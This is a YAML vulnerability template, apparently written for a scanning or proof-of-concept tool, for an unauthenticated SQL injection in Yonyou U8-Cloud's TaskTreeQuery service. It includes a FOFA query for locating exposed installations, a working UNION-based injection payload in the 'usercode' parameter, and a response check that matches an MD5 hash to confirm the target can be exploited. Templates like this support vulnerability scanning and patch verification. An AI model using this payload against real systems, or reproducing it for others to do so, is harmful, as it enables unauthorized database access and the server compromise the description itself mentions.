product: 用友U8-Cloud
vName: 用友U8-Cloud TaskTreeQuery SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 用友U8-Cloud /service/~iufo/nc.itf.iufo.mobilereport.task.TaskTreeQuery接口处存在SQL注入漏洞，未授权的攻击者可以通过此漏洞获取数据库权限，进一步利用可导致服务器失陷。
version: ''
note: ''
search:
  FOFA: app="用友-U8-Cloud"
protocol: http
link: https://blog.csdn.net/qq_41904294/article/details/134794199
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /service/~iufo/nc.itf.iufo.mobilereport.task.TaskTreeQuery?usercode=211' UNION all SELECT 1,sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,4,5,6,7,8,9 from master..sysdatabases--
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
            logic: and